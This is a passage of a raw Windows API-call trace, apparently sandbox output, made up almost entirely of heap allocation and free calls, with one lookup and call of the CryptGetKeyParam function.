[0161.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0161.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0161.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0161.490] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.490] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.490] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0161.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0161.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0161.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0161.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0161.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0161.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0161.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0161.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0161.491] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0161.491] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0161.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0161.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0161.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.491] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0161.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0161.492] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0161.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd420 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0161.492] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0161.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0161.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0161.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0161.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0161.492] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0161.492] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0161.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0161.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0161.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0161.493] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0161.493] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0161.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0161.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0161.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0161.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0161.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0161.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0161.494] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0161.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0161.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0161.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0161.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0161.494] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0161.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0161.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0161.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0161.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0161.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0161.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0161.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0161.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0161.495] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0161.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0161.495] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.495] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0161.496] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0161.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.496] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.497] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0161.497] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2808, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2808*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0161.497] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: 